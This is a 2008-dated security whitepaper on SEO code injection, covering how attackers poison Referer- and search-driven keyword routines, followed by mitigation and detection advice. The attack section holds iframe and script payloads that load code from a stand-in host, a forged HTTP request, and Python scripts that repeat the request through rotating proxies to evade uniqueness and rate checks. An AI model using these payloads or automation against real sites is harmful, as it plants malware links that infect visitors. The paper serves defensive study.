
SEO Code Injection
Search Engine Optimization Poisoning
Published: August 2008

Search Engine Optimization (SEO) is a critical component of an organization's ability to be discovered by prospective customers and clients as they search online for information and products. It is a technique commonly employed by the largest and most sophisticated Internet businesses, and a key component of their online business strategy.

Unfortunately, the nature of SEO algorithms, and the subsequent modification of dynamic site content that they promote, means that they can often be manipulated by an attacker. Vulnerable Web applications can be used to propagate infectious code capable of compromising an organization's prospective customers and clients. This brief paper explains the technique referred to as SEO Code Injection (or Poisoning), and the steps that may be taken to detect and mitigate the vulnerability.

Attack Objectives

Unlike standard SEO manipulation, which focuses on manipulating the relative page-rank positioning of results within popular search engines, SEO Code Injection attacks are designed to fool a Web application's backend systems into embedding malicious code within dynamically created page content. In a successful attack, any subsequent request for the targeted page (or related pages on the same site) will result in the attacker's malicious code being included as part of the page content, and that code will likely be executed within the remote user's Web browser during the page rendering process.

While an attacker could attempt to embed almost any kind of malicious code through a vulnerable SEO vector, in most cases the preferred method is to include short code segments that cause a visitor's Web browser to link to, and execute, more advanced malicious code elements hosted on external Web servers under the attacker's direct control.

How it Works

In essence, SEO Code Injection is a fairly simple attack that targets Web site visitors by abusing poor application logic and exploiting content sanitization flaws within the backend Web application service.

For an attack to be successful, the Web application must provide three functions (a minimal sketch of such a vulnerable routine follows this list):

  • The application must create page content dynamically based upon how the visitor initially reaches or finds a particular page, and embed elements of that data within the resultant page.
  • The application must "weigh" page content based upon the frequency of dynamic keywords – keywords that are typically used to optimize page-ranking placement within search engines.
  • The application must fail to correctly sanitize user-supplied data – in particular, data capable of containing HTML and scripting elements.
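
To make the flawed application logic concrete, the following is a minimal sketch (in Python, purely hypothetical – the function names and generated markup are illustrative, not drawn from any real framework) of a vulnerable SEO routine that extracts search keywords from the Referer header and embeds them in page markup without sanitization:

    # Hypothetical sketch of a vulnerable SEO routine; all names are
    # illustrative, not from a real framework's API.
    from urllib.parse import urlparse, parse_qs

    def extract_search_keywords(referer):
        # Pull the "q=" search terms out of a search-engine Referer URL.
        query = parse_qs(urlparse(referer).query)
        return query.get("q", [""])[0].split()

    def build_meta_keywords(referer, existing_keywords):
        # VULNERABLE: keywords are embedded into page markup verbatim,
        # with no white-list filtering or HTML encoding.
        keywords = existing_keywords + extract_search_keywords(referer)
        return '<meta name="keywords" content="%s">' % ", ".join(keywords)

Note that parse_qs() URL-decodes the query string, so an encoded payload in the Referer arrives at build_meta_keywords() as raw HTML.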

While the specific formulation of the attack can take on various forms depending upon the nuances of the vulnerable Web application itself, the process of conducting an attack is typically straightforward. The description below explains the most common vectors used in attacks conducted in the first half of 2008.

  1.  Reconnaissance. To prepare for the attack, the attacker must first perform a degree of reconnaissance to identify suitable keywords and Web sites running vulnerable application services.

    A. Identify Keywords. The attacker identifies keywords that are likely to be searched for by potential victims of the attack. These words may be commonly searched for items (e.g. brand-name shoes, music bands, etc.) or, more commonly, keywords associated with major recent news events (e.g. drug overdoses, natural disasters, etc.).

    B. Identify Sites. The attacker identifies Web sites that consistently appear high in the page-ranking of search engine results. These are sites that typically refresh their page content frequently (e.g. News sites, blog sites, online sales sites, etc.), and already use dynamic SEO algorithms to affect search engine page-rank placements.

    C. Identify Vulnerabilities. The attacker tests the degree of data sanitization performed by the Web application logic. For example, what (if any) HTML tags are removed or filtered, and whether different forms of character encoding are allowed (e.g. escape encoding, Unicode encoding, UTF-8, etc.).
  2. Construction. Having performed their reconnaissance and decided upon the vulnerable Web sites to be targeted for the SEO Code Injection attack, the attacker must then construct the payload(s) that will be used to exploit the previously identified data sanitization flaws.

    A. REFERER Fields. Many SEO routines utilize the REFERER field contained within the HTTP header of a Web browser's page request to decide which keywords should be included within page metadata. Whenever a user clicks on a link listed in the results returned by a search engine after inputting their search criteria, the resultant page request will contain a REFERER URL that identifies not only the search engine they used, but also the keywords they were searching for.
    For example, a REFERER from the Google search for the words “Gunter Ollmann” may look like http://www.google.com/search?hl=en&q=Gunter+Ollmann while a query for “Günter Ollmann” may contain q=G%C3%BCnter+Ollmann within the REFERER.
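
    The two forms are equivalent once URL-decoded, which is why encoding variants matter during reconnaissance (step 1.C above). A quick standard-library Python demonstration:

        # Both Referer forms carry the same keywords once URL-decoded.
        from urllib.parse import unquote_plus

        print(unquote_plus("Gunter+Ollmann"))        # Gunter Ollmann
        print(unquote_plus("G%C3%BCnter+Ollmann"))   # Günter Ollmann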

    B. Site Search Criteria. Many popular sites also provide local search engines for keyword searches within their own content. As site visitors use the local search capability, the Web application may monitor their keywords and record which specific content they subsequently viewed. If multiple keywords are searched for, but only a few of those keywords are contained within the most popular pages that visitors then go on to view, the SEO routines may selectively embed or cache the missing keywords into the resultant page to increase the probability that the same page will be found in the future using those "missing" keywords.

    C. Malicious Keyword. Having decided upon the relevant SEO keyword injection vector, the attacker formulates the "keyword" he wishes to insert. In most recent public attacks, the "keyword" is a specially formatted link to an externally hosted malicious script; a script designed to exploit vulnerabilities within the victim's Web browser and secretly install malware.
    Depending upon the degree of data sanitization of the vulnerable Web site and how it dynamically wraps additional keywords within the page content, the attacker may opt for links such as:
    ><iframe src=//attack.org/bad.js>
    or implement simple white-list evasion techniques such as:
                    %3Cscript%20src=%22http%3A%2F%2Fattack.org%2Fbad.js%22%3E%3C%2Fscript%3E

    D. The Payload. The payload, whether contained within the REFERER or submitted through the Web application's local search routines, will typically be included with other legitimate search keywords to ensure the "correct" pages are targeted. For example, the search query may be "Günter XSS ><iframe src=//attack.org/bad.js>", which would render in the REFERER as:
                    G%C3%BCnter+XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
  3. Automation. In most cases, the SEO routines of popular vulnerable Web applications require a frequency threshold to be met. Based upon the frequency of a keyword, it may be placed in escalating positions within the dynamically generated page. For example, an infrequently referenced keyword may be embedded within the page's metadata tags, while a commonly searched-for keyword may appear within the page title, or as part of the page's file name (i.e. as part of the actual URL). In other cases, the entire search string may simply be cached by the application server and presented in its entirety on a page.
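
    The sketch below (Python; the threshold values are purely illustrative – real applications will differ) shows the kind of escalation logic just described:

        # Hypothetical frequency-threshold placement; values are illustrative.
        def place_keyword(keyword, frequency):
            if frequency > 1000:
                return "title"      # commonly searched for: page title or URL
            elif frequency > 100:
                return "metadata"   # embedded within the page's metadata tags
            return "ignored"        # below threshold: not yet embedded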

    A. Fake REFERER. Since HTTP is a stateless protocol, the targeted Web site must trust the Web browser's REFERER data as being correct. This information, along with any other HTTP request information, can be easily forged.
    Instead of having to repeatedly search for the keywords and click on the subsequent link to initiate an SEO Code Injection attack, the attacker can simply craft a stand-alone HTTP request packet and send that repeatedly instead – thereby greatly speeding up the attack (important if SEO thresholds are high) and removing the need for repeated use of an external search engine, or even a Web browser.
    A crafted HTTP request may look like the following:
    GET /target_page.php HTTP/1.0
    Accept: */*
    Referer: http://www.google.com/search?hl=en&q=XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
    Accept-Language: en-us
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0
    Host: www.vulnerable.com
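
    The same forged request can be generated programmatically. A minimal sketch using Python's standard library (the host name and payload are the illustrative values from this paper, not real targets):

        # Send the forged request above; the Host header is added automatically.
        import http.client

        payload = "XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E"
        forged_referer = "http://www.google.com/search?hl=en&q=" + payload

        conn = http.client.HTTPConnection("www.vulnerable.com")
        conn.request("GET", "/target_page.php", headers={
            "Referer": forged_referer,   # forged: the server cannot verify it
            "User-Agent": "Mozilla/4.0",
            "Accept": "*/*",
        })
        print(conn.getresponse().status)
        conn.close()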


    B. Distributed Submission. While it may be possible for a would-be attacker to repeatedly type their malicious keyword payloads into the search engine, almost all SEO Code Injection attacks are conducted using automated tools. Once an HTTP request packet has been created, it can be repeatedly sent using any number of tools and scripts, or it may be farmed out to a botnet.
    Some Web application SEO routines check additional submission data for uniqueness of the page request (e.g. cookies, IP address, etc.) – but these checks can be easily overcome using a small degree of additional automation and distributed botnets or proxies.
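
    A hedged sketch of such automation – rotating requests through proxies to defeat source-IP uniqueness checks. The proxy addresses, request count, and pacing are illustrative assumptions:

        # Repeat the forged request through rotating proxies (illustrative).
        import time
        import urllib.request

        forged_referer = ("http://www.google.com/search?hl=en&q="
                          "XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E")
        proxies = ["203.0.113.10:8080", "198.51.100.22:3128"]  # example addresses

        for i in range(500):                   # repeat until the threshold is met
            proxy = proxies[i % len(proxies)]  # rotate the apparent source IP
            opener = urllib.request.build_opener(
                urllib.request.ProxyHandler({"http": "http://" + proxy}))
            req = urllib.request.Request(
                "http://www.vulnerable.com/target_page.php",
                headers={"Referer": forged_referer})
            opener.open(req, timeout=10).read()
            time.sleep(1)                      # pace requests to evade rate checks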

It is important to note that the vulnerability being exploited lies within the Web application server's SEO routines, and not with the method by which victims navigated to an infected page. For example, a home user may search for the keywords "XSS Attack" and end up following a link to a page initially infected by an attacker who used different keywords (e.g. "Gunter XSS"). The actual "legitimate" keywords are irrelevant to the attacker; only the malicious SEO Code Injection content matters.

Mitigation Strategies

To protect against SEO Code Injection attacks, organizations have a number of mitigation strategies they can adopt. While secure development and testing processes are critical, defense in depth through the use of content inspection and filtering technologies can help protect against coding failures and unexpected injection vectors.

Coding Practices

A critical component of mitigating the threat of SEO Code Injection attacks is correct input sanitization. Ideally, any user-supplied content should be processed against a white-list of allowable characters prior to its use in search engine optimization or page creation routines. User-supplied data not covered by the white-list should be automatically dropped. In particular, user-supplied HTML code characters (and their myriad encoded forms) should never be embedded within page content unless specifically authorized and their context is fully understood by the application developer – and even then, professional security advice should be sought. In almost all cases, characters outside the basic ASCII alphanumeric range should never be used in search optimization routines.
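
A minimal sketch of white-list sanitization of the kind described above (Python; the permitted character set is an illustrative choice that each application must decide for itself):

    # White-list sanitizer: drop every character outside the allowed set
    # before the keyword reaches any SEO or page-creation routine.
    import re

    ALLOWED = re.compile(r"[^A-Za-z0-9 \-]")  # letters, digits, space, hyphen

    def sanitize_keyword(raw):
        return ALLOWED.sub("", raw)

    print(sanitize_keyword("><iframe src=//attack.org/bad.js>"))
    # -> "iframe srcattack.orgbad.js" (harmless text; no markup survives)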

Since many SEO Code Injection attack attempts will likely be automated, application developers should consider the use of anti-automation mitigation strategies. These strategies could consist of temporal anomaly detection routines (e.g. flagging inconsistent bursts of network traffic), the use of submission source IP address information to identify uniqueness, and perhaps bad-IP lookups (e.g. are the source IP addresses known botnet agents, or located within heavily botnet-saturated netblocks?).
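
As a hedged illustration of temporal anomaly detection, the following sketch flags any source IP exceeding a submission-rate threshold (the window and limit values are illustrative assumptions):

    # Flag source IPs whose submission rate exceeds a simple threshold.
    import time
    from collections import defaultdict, deque

    WINDOW_SECONDS = 60    # illustrative sliding window
    MAX_SUBMISSIONS = 20   # illustrative per-window limit

    recent = defaultdict(deque)   # source IP -> recent request timestamps

    def is_suspicious(source_ip):
        now = time.time()
        times = recent[source_ip]
        times.append(now)
        while times and now - times[0] > WINDOW_SECONDS:
            times.popleft()       # discard submissions outside the window
        return len(times) > MAX_SUBMISSIONS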

Content Inspection

Given the nature and construction of the actual malicious content (e.g. iframe, script, URL, etc.), and its placement within the HTTP page request (e.g. HTTP REFERER, HTTP GET, etc.), many perimeter and Web application protection systems have the capability to identify the embedded malicious content.

Intrusion Prevention Systems (IPS) that can deep-inspect HTTP headers and identify cross-site scripting, SQL Injection, and other HTML code injection string formulations can stop this malicious inbound content from making its way to the Web application server – thereby protecting any vulnerable SEO routines from attack and subsequent manipulation.
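
The kind of pattern such an inspection layer might apply can be approximated in a few lines. This is only a hedged sketch (real IPS signatures are far more thorough), but it illustrates why decoding before matching matters:

    # Decode the Referer first so %3Cscript%3E-style evasion is caught too.
    import re
    from urllib.parse import unquote_plus

    INJECTION_PATTERN = re.compile(r"<\s*(script|iframe)", re.IGNORECASE)

    def referer_looks_malicious(referer):
        return bool(INJECTION_PATTERN.search(unquote_plus(referer)))

    print(referer_looks_malicious(
        "http://www.google.com/search?q=%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E"))
    # -> True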

Content filtering technologies (e.g. perimeter URL filtering) can often be used to identify the inclusion of URLs previously known to host malicious content. When complementing Web proxy technologies, they can prevent end-users from navigating to malicious links that happen to be embedded within a Web site affected by an SEO Code Injection vulnerability.

Detection Strategies

Uncovering whether a Web application is vulnerable to SEO Code Injection is not a trivial task. As with all second-order code injection attack formats, testing for its presence cannot typically be done by sending a single request, and does not result in an immediately verifiable response; consequently, standard code injection testing methodologies may fail to detect vulnerable vectors.

Tools

Current-generation code auditing suites can sometimes be used to perform a static analysis review of Web application source code. Depending upon the language the application is written in, and the level of access granted to the source code, some tools are capable of detecting probable SEO Code Injection flaws. Since the attack vector is relatively new, and SEO routines themselves are constantly evolving, static analysis code auditing tools for Web applications still have some way to mature and will probably require a high degree of manual tuning.

Many commercial Web application vulnerability scanners are capable of manipulating HTTP header fields and identifying places within a vulnerable application that incorrectly sanitize data. However, sophisticated SEO routines which require thresholds to be met before triggering page content modification will likely go undetected unless the application vulnerability scanner is specifically configured to repeat tests until they exceed the threshold.

Penetration testing

Web application penetration testing methodologies need to encompass tests for identifying likely SEO Code Injection vulnerabilities and vectors. Ideally, testing should include:

  1. Check any local application search functionality to identify whether search criteria can include HTML code characters and their encoded variants, and verify that any search results rendered on subsequent pages are correctly sanitized.
  2. Manipulate HTTP header information on page requests (especially the REFERER and USER-AGENT fields) to identify whether the application is vulnerable to standard cross-site scripting (XSS) and SQL Injection vectors.
  3. Manipulate HTTP REFERER information to impersonate popular search engine URLs that contain monitored keywords and potentially dangerous characters.
  4. Consult with the developers to find out whether submission thresholds are applied to the SEO logic engine. If they are, repeatedly submit crafted REFERER information to exceed those thresholds and evaluate the application's sanitization of the test content (see the sketch following this list).
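
A hedged test-harness sketch for step 4 (Python; the staging host, path, probe marker, and request count are illustrative assumptions – tests of this kind should only ever be run against systems you are authorized to test):

    # Repeat a crafted-Referer request past an assumed SEO threshold,
    # then check whether the probe payload is reflected unsanitized.
    import urllib.request

    MARKER = "%3Ciframe%20src%3D%2F%2Ftest.example%2Fprobe.js%3E"
    referer = "http://www.google.com/search?hl=en&q=seotest+" + MARKER
    target = "http://staging.example.com/target_page.php"

    for _ in range(200):    # exceed the assumed frequency threshold
        req = urllib.request.Request(target, headers={"Referer": referer})
        urllib.request.urlopen(req, timeout=10).read()

    page = urllib.request.urlopen(target, timeout=10).read()
    if b"<iframe src=//test.example/probe.js>" in page:
        print("VULNERABLE: unsanitized payload reflected in page content")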

Conclusions

2008 saw the birth of the threat now known as SEO Code Injection or Poisoning. As SEO routines mature and adapt to changes in Internet search page-ranking systems, organizations will continue to be exposed to new threats and attack vectors that exploit weaknesses in them.

Given the complexity of the way SEO routines function – in particular the algorithms behind repetitive keyword ranking – the process of detecting exploitable flaws in a Web application is more involved, and newer methodologies are required to detect SEO Code Injection vulnerabilities.

From a mitigation perspective, advanced IPS technologies, when deployed correctly, can be configured to protect against the injection of the malicious payloads used in attacks against the Web application.

Additional Reading

“Massive IFRAME SEO Poisoning Attack Continuing”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

“More High Profile Sites IFRAME Injected”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

“URL Embedded Attacks”, Gunter Ollmann, http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html

“HTML Code Injection and Cross-site Scripting”, Gunter Ollmann, http://www.technicalinfo.net/papers/CSS.html

“Second-order Code Injection”, Gunter Ollmann, http://www.technicalinfo.net/papers/SecondOrderCodeInjection.html

“Stopping Automated Attack Tools”, Gunter Ollmann, http://www.technicalinfo.net/papers/StoppingAutomatedAttackTools.html

"SEO Poisoning Attacks Growing", Robert Lemos, http://www.securityfocus.com/brief/701

"A Second-order of XSS", Gunter Ollmann, http://blogs.iss.net/archive/SecondOrderXSS.html

Copyright © 2001-2008 Gunter Ollmann